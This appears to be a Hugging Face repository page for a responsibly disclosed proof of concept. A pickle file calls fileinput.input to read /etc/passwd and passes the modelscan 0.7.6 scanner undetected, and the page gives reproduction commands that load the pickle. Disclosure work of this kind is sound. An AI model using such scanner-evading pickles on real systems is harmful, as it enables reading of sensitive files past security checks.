You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

modelscan-bypass-fileinput

Modelscan Bypass PoC β€” fileinput.input

Severity: MEDIUM Impact: Arbitrary file read β€” fileinput.input(files) reads any file accessible to the process modelscan version: 0.7.6 (latest on PyPI) Result: "No issues found!" βœ… (false negative)

Chain

fileinput.input(["/etc/passwd"]) β†’ reads sensitive files

Why It Works

fileinput.input is NOT in modelscan's unsafe_globals blocklist. fileinput is NOT in the blocklist.

Reproduction

pip install modelscan
modelscan scan -p bypass_poc.pkl
# Output: "No issues found!"
python3 -c "import pickle; pickle.loads(open('bypass_poc.pkl','rb').read())"
# Executes arbitrary code

Responsible Disclosure

This PoC is part of a responsible disclosure to ProtectAI via Huntr MFV program.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support